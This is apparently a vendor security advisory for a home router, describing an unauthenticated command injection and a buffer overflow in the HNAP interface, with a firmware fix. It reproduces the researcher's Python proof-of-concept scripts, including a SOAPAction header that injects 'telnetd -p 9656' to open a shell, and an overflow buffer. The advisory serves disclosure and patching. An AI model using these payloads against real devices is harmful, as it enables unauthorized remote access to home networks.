• Home Support Forums Security Advisories Shop     English | French
Security Announcement
Announcement > SAP10051
DIR-645 : Rev. Ax - Command Injection - Buffer Overflow : FW 1.04b12
Publication ID: SAP10051
Resolved Status: Yes
Published on: 13 February 2015 4:29 GMT
Last updated on: 25 April 2015 1:27 GMT




The DIR-645 Wired/Wireless Router contains a flaw that allows a malicious user to cause an overflow (halt in executing application) in the device software that  could allows access to it's operating system and allows unauthenticated commands to be executied. An additional flaw has been found that allows command injection through it's HNAP interface.




Samuel Huntley - Contact : Link  (Jan. 22, 2015)





Using firmware in an emulator to determine exploits, the author designed exploit scripts written in python that give details.

"The buffer overflow does not have a payload at this time, however if you watch the exploit in a debugger, then it can be clearly seen that the payload uses ROP techniques to get to stack payload which is a bunch of C's for now on the stack. It can be replaced with any payload that works on MIPS little endian architecture."

In order to maintain author's intent and accuracy of the disclosure we encourage you to contact the author at the provided link above.



1. Command injection


import socket
import struct
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST:\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + 'test;telnetd -p 9656;test\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 80))


2. Buffer overflow
import socket
import struct
exploit_buffer = "POST /HNAP1/ HTTP/1.0\r\nHOST:\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";pt;"+"B"*158
exploit_buffer+="C"*212+"\r\n" + "1\r\n\r\n"
print "[+] sending exploit_bufferfer size", len(exploit_buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 80))


Affected Product


Model Name

HW Version

Current FW Version

New FW Version for this exploit fix



v. 1.04b12 and older

FW: Patch 1.05b01

Release Notes: Link


(Updated: 04/24/2015)


Security patch for your D-Link Devices


These firmware updates address the security vulnerabilities in affected D-Link devices. D-Link will update this continually and we strongly recommend all users to install the relevant updates.


As there are different hardware revisions on our products, please check this on your device before downloading the correct corresponding firmware update. The hardware revision information can usually be found on the product label on the underside of the product next to the serial number. Alternatively, they can also be found on the device web configuration.